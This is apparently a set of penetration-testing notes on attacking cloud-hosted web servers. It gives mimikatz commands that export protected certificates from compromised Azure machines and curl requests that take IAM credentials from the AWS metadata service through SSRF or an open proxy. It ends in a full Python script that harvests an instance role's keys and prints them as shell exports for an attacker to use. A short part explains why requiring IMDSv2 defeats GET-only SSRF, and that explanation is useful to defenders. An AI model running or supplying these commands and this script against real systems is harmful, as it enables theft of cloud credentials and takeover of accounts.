Cloud provider web servers

Web servers hosted with a cloud provider expose some attack surface that a 'normal' web server does not.

Azure Windows web server

If you compromise an Azure Windows server, you may be able to use mimikatz to export certificates from the machine store (including ones whose private key is marked non-exportable) and then try to authenticate to Azure with them. Get debug privilege first, patch CryptoAPI and CNG so the keys become exportable, then dump the LocalMachine\My store:

privilege::debug
crypto::capi
crypto::cng
crypto::certificates /systemstore:local_machine /store:my /export

The exported .pfx files land in mimikatz's working directory and are protected with the password "mimikatz".

AWS

Instance Metadata

Cloud servers hosted on services like EC2 need a way to learn about themselves (instance ID, region, attached IAM role). For that AWS provides the Instance Metadata Service (IMDS), an HTTP endpoint on the link-local address 169.254.169.254. Among other things it hands out the temporary access key, secret key and session token of the IAM role attached to the instance.

It is only reachable from the instance itself (link-local address), so it is abused after a server compromise or through SSRF.

The attached role name and its temporary credentials are served here:

http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM ROLE NAME>

It can also be hit from outside if a reverse proxy on the instance is misconfigured as an open forward proxy (a common nginx mistake): the request below asks the proxy to fetch the link-local address on your behalf.

curl --proxy host.domain.com:80 http://169.254.169.254/latest/meta-data/iam/security-credentials/ && echo

AWS EC2 Instance Metadata Service Version 2 (IMDSv2)

Introduced in November 2019. IMDSv2 is session-oriented: you first send a PUT request, which responds with a session token, and then pass that token as a header on every GET. This defeats most SSRF primitives, which usually cannot issue a PUT with a custom header, and the service refuses to issue a token to any request carrying an X-Forwarded-For header (i.e. anything that came through a proxy). It only helps if the instance is configured to require IMDSv2; where v2 is merely optional, the plain v1 GETs above still work.

TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

curl -s http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"

The same header works for every other path, including the security-credentials URLs above.
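The whole procedure above (try the v2 token PUT first, fall back to v1 GETs, then pull the attached role's credentials) as one script. This is an added example, not part of the original notes: the HTTP transport is injectable so the exchange can be run offline against a constructed fake of the metadata service, and the role name, token and key values in those fakes are made up. Only urllib_transport talks to the real 169.254.169.254.

```python
import json
import urllib.error
import urllib.request

IMDS_BASE = "http://169.254.169.254"
TOKEN_PATH = "/latest/api/token"
CREDS_PATH = "/latest/meta-data/iam/security-credentials/"
TTL_HEADER = "X-aws-ec2-metadata-token-ttl-seconds"
TOKEN_HEADER = "X-aws-ec2-metadata-token"


def urllib_transport(method, url, headers, timeout=2):
    """Real transport against the link-local endpoint: returns (status, body)."""
    req = urllib.request.Request(url, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, ""
    except urllib.error.URLError:
        return 0, ""


def get_token(transport, base=IMDS_BASE, ttl=21600):
    """IMDSv2 step 1: PUT for a session token. None if refused (v1 fallback)."""
    status, body = transport("PUT", base + TOKEN_PATH, {TTL_HEADER: str(ttl)})
    return body if status == 200 and body else None


def imds_get(transport, path, token=None, base=IMDS_BASE):
    """GET a metadata path, attaching the v2 token header when we have one."""
    headers = {TOKEN_HEADER: token} if token else {}
    status, body = transport("GET", base + path, headers)
    return body if status == 200 else None


def fetch_role_credentials(transport=urllib_transport, base=IMDS_BASE):
    """Try v2 first, fall back to v1; return role name + parsed credentials."""
    token = get_token(transport, base)
    role_list = imds_get(transport, CREDS_PATH, token, base)
    if not role_list:
        return None  # no role attached, or v2 required and we only have v1 reach
    role = role_list.splitlines()[0].strip()
    raw = imds_get(transport, CREDS_PATH + role, token, base)
    if not raw:
        return None
    return {"version": "IMDSv2" if token else "IMDSv1",
            "role": role, "creds": json.loads(raw)}


def as_env_exports(result):
    """Turn the credential document into shell exports the AWS CLI understands."""
    c = result["creds"]
    return (f"export AWS_ACCESS_KEY_ID={c['AccessKeyId']}\n"
            f"export AWS_SECRET_ACCESS_KEY={c['SecretAccessKey']}\n"
            f"export AWS_SESSION_TOKEN={c['Token']}\n")


# --- Constructed fakes for offline testing (made-up values, not AWS data) ----
FAKE_TOKEN = "AQAAAExampleSessionToken=="
FAKE_ROLE = "webserver-role"
FAKE_CREDS = {"Code": "Success", "Type": "AWS-HMAC",
              "AccessKeyId": "ASIAEXAMPLEKEYID", "SecretAccessKey": "exampleSecret",
              "Token": "exampleSessionToken", "Expiration": "2024-01-01T06:00:00Z"}


def make_fake_imds(require_v2):
    """Fake metadata service; require_v2=True models 'IMDSv2 required'."""
    def transport(method, url, headers):
        path = url[len(IMDS_BASE):]
        if method == "PUT" and path == TOKEN_PATH:
            # No token for proxied requests (X-Forwarded-For) or a missing TTL header.
            if "X-Forwarded-For" in headers or TTL_HEADER not in headers:
                return 403, ""
            return 200, FAKE_TOKEN
        if require_v2 and headers.get(TOKEN_HEADER) != FAKE_TOKEN:
            return 401, ""
        if path == CREDS_PATH:
            return 200, FAKE_ROLE + "\n"
        if path == CREDS_PATH + FAKE_ROLE:
            return 200, json.dumps(FAKE_CREDS)
        return 404, ""
    return transport


def via_get_only_ssrf(transport):
    """Wrap a transport as a typical SSRF primitive that can only issue GETs."""
    return lambda m, u, h: transport(m, u, h) if m == "GET" else (0, "")


if __name__ == "__main__":
    result = fetch_role_credentials()  # real endpoint; only works on an EC2 instance
    print(as_env_exports(result) if result else "no IAM credentials reachable")
```

Run on a compromised instance it prints exports you can paste into a shell; the fakes show why "IMDSv2 required" matters: a GET-only SSRF against the v2-required fake gets nothing, while the same SSRF against the v2-optional fake still walks away with the role's keys.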